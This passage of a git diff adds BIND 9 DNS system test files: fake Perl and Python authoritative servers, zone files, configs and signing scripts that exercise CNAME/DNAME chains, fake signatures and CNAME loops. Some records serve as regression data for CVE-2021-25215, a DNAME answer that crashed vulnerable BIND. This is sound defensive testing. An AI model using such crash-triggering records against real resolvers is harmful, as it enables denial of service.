(!$localport) { $localport = 5300; } + +my $verbose = 0; +my $ttl = 60; +my $zone = "example.broken"; +my $nsname = "ns3.$zone"; +my $synth = "synth-then-dname.$zone"; +my $synth2 = "synth2-then-dname.$zone"; + +sub reply_handler { + my ($qname, $qclass, $qtype, $peerhost, $query, $conn) = @_; + my ($rcode, @ans, @auth, @add); + + print ("request: $qname/$qtype\n"); + STDOUT->flush(); + + if ($qname eq "example.broken") { + if ($qtype eq "SOA") { + my $rr = new Net::DNS::RR("$qname $ttl $qclass SOA . . 0 0 0 0 0"); + push @ans, $rr; + } elsif ($qtype eq "NS") { + my $rr = new Net::DNS::RR("$qname $ttl $qclass NS $nsname"); + push @ans, $rr; + $rr = new Net::DNS::RR("$nsname $ttl $qclass A $localaddr"); + push @add, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname eq "cname-to-$synth2") { + my $rr = new Net::DNS::RR("$qname $ttl $qclass CNAME name.$synth2"); + push @ans, $rr; + $rr = new Net::DNS::RR("name.$synth2 $ttl $qclass CNAME name"); + push @ans, $rr; + $rr = new Net::DNS::RR("$synth2 $ttl $qclass DNAME ."); + push @ans, $rr; + $rcode = "NOERROR"; + } elsif ($qname eq "$synth" || $qname eq "$synth2") { + if ($qtype eq "DNAME") { + my $rr = new Net::DNS::RR("$qname $ttl $qclass DNAME ."); + push @ans, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname eq "name.$synth") { + my $rr = new Net::DNS::RR("$qname $ttl $qclass CNAME name."); + push @ans, $rr; + $rr = new Net::DNS::RR("$synth $ttl $qclass DNAME ."); + push @ans, $rr; + $rcode = "NOERROR"; + } elsif ($qname eq "name.$synth2") { + my $rr = new Net::DNS::RR("$qname $ttl $qclass CNAME name."); + push @ans, $rr; + $rr = new Net::DNS::RR("$synth2 $ttl $qclass DNAME ."); + push @ans, $rr; + $rcode = "NOERROR"; + # The following three code branches referring to the "example.dname" + # zone are necessary for the resolver variant of the CVE-2021-25215 + # regression test to work. A named instance cannot be used for + # serving the DNAME records below as a version of BIND vulnerable to + # CVE-2021-25215 would crash while answering the queries asked by + # the tested resolver. + } elsif ($qname eq "ns3.example.dname") { + if ($qtype eq "A") { + my $rr = new Net::DNS::RR("$qname $ttl $qclass A 10.53.0.3"); + push @ans, $rr; + } + if ($qtype eq "AAAA") { + my $rr = new Net::DNS::RR("example.dname. $ttl $qclass SOA . . 0 0 0 0 $ttl"); + push @auth, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname eq "self.example.self.example.dname") { + my $rr = new Net::DNS::RR("self.example.dname. $ttl $qclass DNAME dname."); + push @ans, $rr; + $rr = new Net::DNS::RR("$qname $ttl $qclass CNAME self.example.dname."); + push @ans, $rr; + $rcode = "NOERROR"; + } elsif ($qname eq "self.example.dname") { + if ($qtype eq "DNAME") { + my $rr = new Net::DNS::RR("$qname $ttl $qclass DNAME dname."); + push @ans, $rr; + } + $rcode = "NOERROR"; + } else { + $rcode = "REFUSED"; + } + return ($rcode, \@ans, \@auth, \@add, { aa => 1 }); +} + +GetOptions( + 'port=i' => \$localport, + 'verbose!' => \$verbose, +); + +my $ns = Net::DNS::Nameserver->new( + LocalAddr => $localaddr, + LocalPort => $localport, + ReplyHandler => \&reply_handler, + Verbose => $verbose, +); + +$ns->main_loop; diff --git a/bin/tests/system/chain/ans4/README.anspy b/bin/tests/system/chain/ans4/README.anspy new file mode 100644 index 0000000..7cb0bf0 --- /dev/null +++ b/bin/tests/system/chain/ans4/README.anspy @@ -0,0 +1,24 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +SPDX-License-Identifier: MPL-2.0 + +This Source Code Form is subject to the terms of the Mozilla Public +License, v. 2.0. If a copy of the MPL was not distributed with this +file, you can obtain one at https://mozilla.org/MPL/2.0/. + +See the COPYRIGHT file distributed with this work for additional +information regarding copyright ownership. + +REQUIREMENTS +ans.py requires at least dnspython 1.12.0. + +"ans.py" is a fairly simple Python script that will respond as an +authoritative server to DNS queries. It opens a UDP socket on 10.53.0.4 +and fd92:7065:b8e:ffff::8, port 5300 (or PORT) (these are for DNS queries) +and a TCP socket addresses on 10.53.0.4 at port 5301 (or EXTRAPORT1) +(this is the control channel). + +Please note that all functionality and formatting are subject to change as +we determine what features the tool will need. + +"ans.py" will respond to queries as follows: TBD diff --git a/bin/tests/system/chain/ans4/ans.py b/bin/tests/system/chain/ans4/ans.py new file mode 100755 index 0000000..839067f --- /dev/null +++ b/bin/tests/system/chain/ans4/ans.py @@ -0,0 +1,386 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +############################################################################ +# ans.py: See README.anspy for details. +############################################################################ + +from __future__ import print_function +import os +import sys +import signal +import socket +import select +from datetime import datetime, timedelta +import functools + +import dns, dns.message, dns.query +from dns.rdatatype import * +from dns.rdataclass import * +from dns.rcode import * +from dns.name import * + +############################################################################ +# set up the RRs to be returned in the next answer +# +# the message contains up to two pipe-separated ('|') fields. +# +# the first field of the message is a comma-separated list +# of actions indicating what to put into the answer set +# (e.g., a dname, a cname, another cname, etc) +# +# supported actions: +# - cname (cname from the current name to a new one in the same domain) +# - dname (dname to a new domain, plus a synthesized cname) +# - xname ("external" cname, to a new name in a new domain) +# +# example: xname, dname, cname represents a CNAME to an external +# domain which is then answered by a DNAME and synthesized +# CNAME pointing to yet another domain, which is then answered +# by a CNAME within the same domain, and finally an answer +# to the query. each RR in the answer set has a corresponding +# RRSIG. these signatures are not valid, but will exercise the +# response parser. +# +# the second field is a comma-separated list of which RRs in the +# answer set to include in the answer, in which order. if prepended +# with 's', the number indicates which signature to include. +# +# examples: for the answer set "cname, cname, cname", an rr set +# '1, s1, 2, s2, 3, s3, 4, s4' indicates that all four RRs should +# be included in the answer, with siagntures, in the original +# order, while 4, s4, 3, s3, 2, s2, 1, s1' indicates the order +# should be reversed, 's3, s3, s3, s3' indicates that the third +# RRSIG should be repeated four times and everything else should +# be omitted, and so on. +# +# if there is no second field (i.e., no pipe symbol appears in +# the line) , the default is to send all answers and signatures. +# if a pipe symbol exists but the second field is empty, then +# nothing is sent at all. +############################################################################ +actions = [] +rrs = [] + + +def ctl_channel(msg): + global actions, rrs + + msg = msg.splitlines().pop(0) + print("received control message: %s" % msg) + + msg = msg.split(b"|") + if len(msg) == 0: + return + + actions = [x.strip() for x in msg[0].split(b",")] + n = functools.reduce( + lambda n, act: (n + (2 if act == b"dname" else 1)), [0] + actions + ) + + if len(msg) == 1: + rrs = [] + for i in range(n): + for b in [False, True]: + rrs.append((i, b)) + return + + rlist = [x.strip() for x in msg[1].split(b",")] + rrs = [] + for item in rlist: + if item[0] == b"s"[0]: + i = int(item[1:].strip()) - 1 + if i > n: + print("invalid index %d" + (i + 1)) + continue + rrs.append((int(item[1:]) - 1, True)) + else: + i = int(item) - 1 + if i > n: + print("invalid index %d" % (i + 1)) + continue + rrs.append((i, False)) + + +############################################################################ +# Respond to a DNS query. +############################################################################ +def create_response(msg): + m = dns.message.from_wire(msg) + qname = m.question[0].name.to_text() + labels = qname.lower().split(".") + wantsigs = True if m.ednsflags & dns.flags.DO else False + + # get qtype + rrtype = m.question[0].rdtype + typename = dns.rdatatype.to_text(rrtype) + + # for 'www.example.com.'... + # - name is 'www' + # - domain is 'example.com.' + # - sld is 'example' + # - tld is 'com.' + name = labels.pop(0) + domain = ".".join(labels) + sld = labels.pop(0) + tld = ".".join(labels) + + print("query: " + qname + "/" + typename) + print("domain: " + domain) + + # default answers, depending on QTYPE. + # currently only A, AAAA, TXT and NS are supported. + ttl = 86400 + additionalA = "10.53.0.4" + additionalAAAA = "fd92:7065:b8e:ffff::4" + if typename == "A": + final = "10.53.0.4" + elif typename == "AAAA": + final = "fd92:7065:b8e:ffff::4" + elif typename == "TXT": + final = "Some\ text\ here" + elif typename == "NS": + domain = qname + final = "ns1.%s" % domain + else: + final = None + + # RRSIG rdata - won't validate but will exercise response parsing + t = datetime.now() + delta = timedelta(30) + t1 = t - delta + t2 = t + delta + inception = t1.strftime("%Y%m%d000000") + expiry = t2.strftime("%Y%m%d000000") + sigdata = "OCXH2De0yE4NMTl9UykvOsJ4IBGs/ZIpff2rpaVJrVG7jQfmj50otBAp A0Zo7dpBU4ofv0N/F2Ar6LznCncIojkWptEJIAKA5tHegf/jY39arEpO cevbGp6DKxFhlkLXNcw7k9o7DSw14OaRmgAjXdTFbrl4AiAa0zAttFko Tso=" + + # construct answer set. + answers = [] + sigs = [] + curdom = domain + curname = name + i = 0 + + for action in actions: + if name != "test": + continue + if action == b"xname": + owner = curname + "." + curdom + newname = "cname%d" % i + i += 1 + newdom = "domain%d.%s" % (i, tld) + i += 1 + target = newname + "." + newdom + print("add external CNAME %s to %s" % (owner, target)) + answers.append(dns.rrset.from_text(owner, ttl, IN, CNAME, target)) + rrsig = "CNAME 5 3 %d %s %s 12345 %s %s" % ( + ttl, + expiry, + inception, + domain, + sigdata, + ) + print("add external RRISG(CNAME) %s to %s" % (owner, target)) + sigs.append(dns.rrset.from_text(owner, ttl, IN, RRSIG, rrsig)) + curname = newname + curdom = newdom + continue + + if action == b"cname": + owner = curname + "." + curdom + newname = "cname%d" % i + target = newname + "." + curdom + i += 1 + print("add CNAME %s to %s" % (owner, target)) + answers.append(dns.rrset.from_text(owner, ttl, IN, CNAME, target)) + rrsig = "CNAME 5 3 %d %s %s 12345 %s %s" % ( + ttl, + expiry, + inception, + domain, + sigdata, + ) + print("add RRSIG(CNAME) %s to %s" % (owner, target)) + sigs.append(dns.rrset.from_text(owner, ttl, IN, RRSIG, rrsig)) + curname = newname + continue + + if action == b"dname": + owner = curdom + newdom = "domain%d.%s" % (i, tld) + i += 1 + print("add DNAME %s to %s" % (owner, newdom)) + answers.append(dns.rrset.from_text(owner, ttl, IN, DNAME, newdom)) + rrsig = "DNAME 5 3 %d %s %s 12345 %s %s" % ( + ttl, + expiry, + inception, + domain, + sigdata, + ) + print("add RRSIG(DNAME) %s to %s" % (owner, newdom)) + sigs.append(dns.rrset.from_text(owner, ttl, IN, RRSIG, rrsig)) + owner = curname + "." + curdom + target = curname + "." + newdom + print("add synthesized CNAME %s to %s" % (owner, target)) + answers.append(dns.rrset.from_text(owner, ttl, IN, CNAME, target)) + rrsig = "CNAME 5 3 %d %s %s 12345 %s %s" % ( + ttl, + expiry, + inception, + domain, + sigdata, + ) + print("add synthesized RRSIG(CNAME) %s to %s" % (owner, target)) + sigs.append(dns.rrset.from_text(owner, ttl, IN, RRSIG, rrsig)) + curdom = newdom + continue + + # now add the final answer + owner = curname + "." + curdom + answers.append(dns.rrset.from_text(owner, ttl, IN, rrtype, final)) + rrsig = "%s 5 3 %d %s %s 12345 %s %s" % ( + typename, + ttl, + expiry, + inception, + domain, + sigdata, + ) + sigs.append(dns.rrset.from_text(owner, ttl, IN, RRSIG, rrsig)) + + # prepare the response and convert to wire format + r = dns.message.make_response(m) + + if name != "test": + r.answer.append(answers[-1]) + if wantsigs: + r.answer.append(sigs[-1]) + else: + for i, sig in rrs: + if sig and not wantsigs: + continue + elif sig: + r.answer.append(sigs[i]) + else: + r.answer.append(answers[i]) + + if typename != "NS": + r.authority.append( + dns.rrset.from_text(domain, ttl, IN, "NS", ("ns1.%s" % domain)) + ) + r.additional.append( + dns.rrset.from_text(("ns1.%s" % domain), 86400, IN, A, additionalA) + ) + r.additional.append( + dns.rrset.from_text(("ns1.%s" % domain), 86400, IN, AAAA, additionalAAAA) + ) + + r.flags |= dns.flags.AA + r.use_edns() + return r.to_wire() + + +def sigterm(signum, frame): + print("Shutting down now...") + os.remove("ans.pid") + running = False + sys.exit(0) + + +############################################################################ +# Main +# +# Set up responder and control channel, open the pid file, and start +# the main loop, listening for queries on the query channel or commands +# on the control channel and acting on them. +############################################################################ +ip4 = "10.53.0.4" +ip6 = "fd92:7065:b8e:ffff::4" + +try: + port = int(os.environ["PORT"]) +except: + port = 5300 + +try: + ctrlport = int(os.environ["EXTRAPORT1"]) +except: + ctrlport = 5300 + +query4_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +query4_socket.bind((ip4, port)) + +havev6 = True +try: + query6_socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) + try: + query6_socket.bind((ip6, port)) + except: + query6_socket.close() + havev6 = False +except: + havev6 = False + +ctrl_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +ctrl_socket.bind((ip4, ctrlport)) +ctrl_socket.listen(5) + +signal.signal(signal.SIGTERM, sigterm) + +f = open("ans.pid", "w") +pid = os.getpid() +print(pid, file=f) +f.close() + +running = True + +print("Listening on %s port %d" % (ip4, port)) +if havev6: + print("Listening on %s port %d" % (ip6, port)) +print("Control channel on %s port %d" % (ip4, ctrlport)) +print("Ctrl-c to quit") + +if havev6: + input = [query4_socket, query6_socket, ctrl_socket] +else: + input = [query4_socket, ctrl_socket] + +while running: + try: + inputready, outputready, exceptready = select.select(input, [], []) + except select.error as e: + break + except socket.error as e: + break + except KeyboardInterrupt: + break + + for s in inputready: + if s == ctrl_socket: + # Handle control channel input + conn, addr = s.accept() + print("Control channel connected") + while True: + msg = conn.recv(65535) + if not msg: + break + ctl_channel(msg) + conn.close() + if s == query4_socket or s == query6_socket: + print("Query received on %s" % (ip4 if s == query4_socket else ip6)) + # Handle incoming queries + msg = s.recvfrom(65535) + rsp = create_response(msg[0]) + if rsp: + s.sendto(rsp, msg[1]) + if not running: + break diff --git a/bin/tests/system/chain/clean.sh b/bin/tests/system/chain/clean.sh new file mode 100755 index 0000000..57b05a7 --- /dev/null +++ b/bin/tests/system/chain/clean.sh @@ -0,0 +1,18 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f dig.out.* named*.pid +rm -f ns*/named.conf +rm -f */named.memstats */named.recursing */named.lock */named.run */ans.run +rm -f ns2/K* ns2/dsset-* ns2/*.db.signed +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/chain/ns1/named.conf.in b/bin/tests/system/chain/ns1/named.conf.in new file mode 100644 index 0000000..5504261 --- /dev/null +++ b/bin/tests/system/chain/ns1/named.conf.in @@ -0,0 +1,27 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation yes; + notify yes; +}; + +zone "." { type primary; file "root.db"; }; diff --git a/bin/tests/system/chain/ns1/root.db b/bin/tests/system/chain/ns1/root.db new file mode 100644 index 0000000..3469fb5 --- /dev/null +++ b/bin/tests/system/chain/ns1/root.db @@ -0,0 +1,51 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA root.domain.nil a.root.servers.nil. ( + 2016012800 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example. NS ns2.example. +ns2.example. A 10.53.0.2 + +example.broken. NS ns3.example.broken. +ns3.example.broken. A 10.53.0.3 + +; for the resolver variant of the CVE-2021-25215 regression test +example.dname. NS ns3.example.dname. +ns3.example.dname. A 10.53.0.3 + +domain0.nil. NS ns2.domain0.nil +domain1.nil. NS ns2.domain0.nil +domain2.nil. NS ns2.domain0.nil +domain3.nil. NS ns2.domain0.nil +domain4.nil. NS ns2.domain0.nil +domain5.nil. NS ns2.domain0.nil +domain6.nil. NS ns2.domain0.nil +domain7.nil. NS ns2.domain0.nil +domain8.nil. NS ns2.domain0.nil +domain9.nil. NS ns2.domain0.nil +ns2.domain0.nil. A 10.53.0.2 +ns2.domain0.nil. AAAA fd92:7065:b8e:ffff::2 + +domain.nil. NS ns4.domain.nil +ns4.domain.nil. A 10.53.0.4 +ns4.domain.nil. AAAA fd92:7065:b8e:ffff::4 + +domain. NS ns4.domain. +ns4.domain. A 10.53.0.4 diff --git a/bin/tests/system/chain/ns2/example.db b/bin/tests/system/chain/ns2/example.db new file mode 100644 index 0000000..c13f2d2 --- /dev/null +++ b/bin/tests/system/chain/ns2/example.db @@ -0,0 +1,69 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 + +a.short A 10.0.0.1 +short-dname DNAME short +a.longlonglonglonglonglonglonglonglonglonglonglonglong A 10.0.0.2 +long-dname DNAME longlonglonglonglonglonglonglonglonglonglonglonglong +toolong-dname DNAME longlonglonglonglonglonglonglonglonglonglonglonglong +cname CNAME a.cnamedname +cnamedname DNAME target +a.target A 10.0.0.3 + +; CNAME to delegation +; (unsigned delegations, external and internal) +sub5 NS ns5.sub5 +ns5.sub5 A 10.53.0.5 +a CNAME a.sub5 +sub2 NS ns2.sub2 +ns2.sub2 A 10.53.0.2 +b CNAME b.sub2 + +; (signed delegation, external and internal) +; note: these DS records are fake and will not validate; we're only +; testing that the resolver handles their presence in a reply correctly +signed-sub5 NS ns5.sub5 +signed-sub5 DS 44137 8 2 1CB4F54E0B4F4F85109143113A3C679716A2377D86EB0907846A03FB 0C0A3927 +c CNAME c.signed-sub5 +signed-sub2 NS ns2.sub2 +signed-sub2 DS 44137 8 2 1CB4F54E0B4F4F85109143113A3C679716A2377D86EB0907846A03FB 0C0A3927 +d CNAME d.signed-sub2 + +; long CNAME loop +loop CNAME goop +goop CNAME boop +boop CNAME soup +soup CNAME gump +gump CNAME bump +bump CNAME lump +lump CNAME rump +rump CNAME romp +romp CNAME bomp +bomp CNAME stomp +stomp CNAME clomp +clomp CNAME clump +clump CNAME hunk +hunk CNAME hank +hank CNAME bank +bank CNAME wank +wank CNAME woop +woop CNAME loop diff --git a/bin/tests/system/chain/ns2/generic.db b/bin/tests/system/chain/ns2/generic.db new file mode 100644 index 0000000..9d59378 --- /dev/null +++ b/bin/tests/system/chain/ns2/generic.db @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 86400 SOA ns2.domain0.nil. hostmaster.ns2.nil. 0 1 1 1 1 +@ 86400 NS ns2.domain0.nil. +ns2 86400 A 10.53.0.2 +ns2 86400 AAAA fd92:7065:b8e:ffff::2 + +@ 86400 A 1.2.3.4 +@ 86400 AAAA 1:2:3::4 +* 86400 A 1.2.3.4 +* 86400 AAAA 1:2:3::4 +; CVE-2021-25215 regression test data +self 86400 DNAME nil. diff --git a/bin/tests/system/chain/ns2/named.conf.in b/bin/tests/system/chain/ns2/named.conf.in new file mode 100644 index 0000000..922d2fa --- /dev/null +++ b/bin/tests/system/chain/ns2/named.conf.in @@ -0,0 +1,74 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + notify yes; +}; + +zone "example" { + type primary; + file "example.db.signed"; + allow-update { any; }; +}; + +zone "sub2.example" { + type primary; + file "sub.db"; +}; + +zone "signed-sub2.example" { + type primary; + file "sub.db"; +}; + +zone "wildcard-secure.example" { + type primary; + file "wildcard-secure.example.db.signed"; +}; + +zone "wildcard-nsec.example" { + type primary; + file "wildcard-nsec.example.db.signed"; +}; + +zone "wildcard-nsec3.example" { + type primary; + file "wildcard-nsec3.example.db.signed"; +}; + +zone "wildcard-nsec3-optout.example" { + type primary; + file "wildcard-nsec3-optout.example.db.signed"; +}; + +zone "domain0.nil" { type primary; file "generic.db"; }; +zone "domain1.nil" { type primary; file "generic.db"; }; +zone "domain2.nil" { type primary; file "generic.db"; }; +zone "domain3.nil" { type primary; file "generic.db"; }; +zone "domain4.nil" { type primary; file "generic.db"; }; +zone "domain5.nil" { type primary; file "generic.db"; }; +zone "domain6.nil" { type primary; file "generic.db"; }; +zone "domain7.nil" { type primary; file "generic.db"; }; +zone "domain8.nil" { type primary; file "generic.db"; }; +zone "domain9.nil" { type primary; file "generic.db"; }; diff --git a/bin/tests/system/chain/ns2/sign.sh b/bin/tests/system/chain/ns2/sign.sh new file mode 100644 index 0000000..c067807 --- /dev/null +++ b/bin/tests/system/chain/ns2/sign.sh @@ -0,0 +1,55 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +zone=example. +zonefile=example.db +signedfile=example.db.signed + +ksk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -b ${DEFAULT_BITS} -fk $zone) +zsk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -b ${DEFAULT_BITS} $zone) +$SIGNER -S -o $zone -f $signedfile $zonefile > /dev/null + +zone=wildcard-secure.example. +zonefile=wildcard-secure.db +signedfile=wildcard-secure.example.db.signed + +ksk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -b ${DEFAULT_BITS} -fk $zone) +zsk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -b ${DEFAULT_BITS} $zone) +$SIGNER -S -o $zone -f $signedfile $zonefile > /dev/null + +zone=wildcard-nsec.example. +zonefile=wildcard.db +signedfile=wildcard-nsec.example.db.signed + +ksk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -b ${DEFAULT_BITS} -fk $zone) +zsk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -b ${DEFAULT_BITS} $zone) +$SIGNER -S -o $zone -f $signedfile $zonefile > /dev/null + +zone=wildcard-nsec3.example. +zonefile=wildcard.db +signedfile=wildcard-nsec3.example.db.signed + +ksk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -b ${DEFAULT_BITS} -fk $zone) +zsk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -b ${DEFAULT_BITS} $zone) +$SIGNER -S -3 - -H 0 -o $zone -f $signedfile $zonefile > /dev/null + +zone=wildcard-nsec3-optout.example. +zonefile=wildcard.db +signedfile=wildcard-nsec3-optout.example.db.signed + +ksk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -b ${DEFAULT_BITS} -fk $zone) +zsk=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -b ${DEFAULT_BITS} $zone) +$SIGNER -S -3 - -H 0 -A -o $zone -f $signedfile $zonefile > /dev/null diff --git a/bin/tests/system/chain/ns2/sub.db b/bin/tests/system/chain/ns2/sub.db new file mode 100644 index 0000000..ad03165 --- /dev/null +++ b/bin/tests/system/chain/ns2/sub.db @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2017031001 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 + +a A 10.0.0.1 +b A 10.0.0.2 +c A 10.0.0.3 +d A 10.0.0.4 diff --git a/bin/tests/system/chain/ns2/wildcard-secure.db b/bin/tests/system/chain/ns2/wildcard-secure.db new file mode 100644 index 0000000..e39237a --- /dev/null +++ b/bin/tests/system/chain/ns2/wildcard-secure.db @@ -0,0 +1,29 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2021051901 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS localhost. + +delegation NS localhost. + DS 12345 13 2 0000000000000000000000000000000000000000000000000000000000000000 + +; CNAME pointing into a child zone +cname CNAME delegation + +; wildcard CNAME pointing at a CNAME pointing into a child zone +* CNAME cname diff --git a/bin/tests/system/chain/ns2/wildcard.db b/bin/tests/system/chain/ns2/wildcard.db new file mode 100644 index 0000000..cc39e9c --- /dev/null +++ b/bin/tests/system/chain/ns2/wildcard.db @@ -0,0 +1,28 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2021051901 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS localhost. + +delegation NS localhost. + +; CNAME pointing into a child zone +cname CNAME delegation + +; wildcard CNAME pointing at a CNAME pointing into a child zone +* CNAME cname diff --git a/bin/tests/system/chain/ns5/named.conf.in b/bin/tests/system/chain/ns5/named.conf.in new file mode 100644 index 0000000..86bbf26 --- /dev/null +++ b/bin/tests/system/chain/ns5/named.conf.in @@ -0,0 +1,42 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + notify yes; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "sub5.example" { + type primary; + file "sub.db"; +}; + +zone "signed-sub5.example" { + type primary; + file "sub.db"; +}; diff --git a/bin/tests/system/chain/ns5/sub.db b/bin/tests/system/chain/ns5/sub.db new file mode 100644 index 0000000..df571fb --- /dev/null +++ b/bin/tests/system/chain/ns5/sub.db @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2017031001 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns5 +ns5 A 10.53.0.5 + +a A 10.0.0.1 +b A 10.0.0.2 +c A 10.0.0.3 +d A 10.0.0.4 diff --git 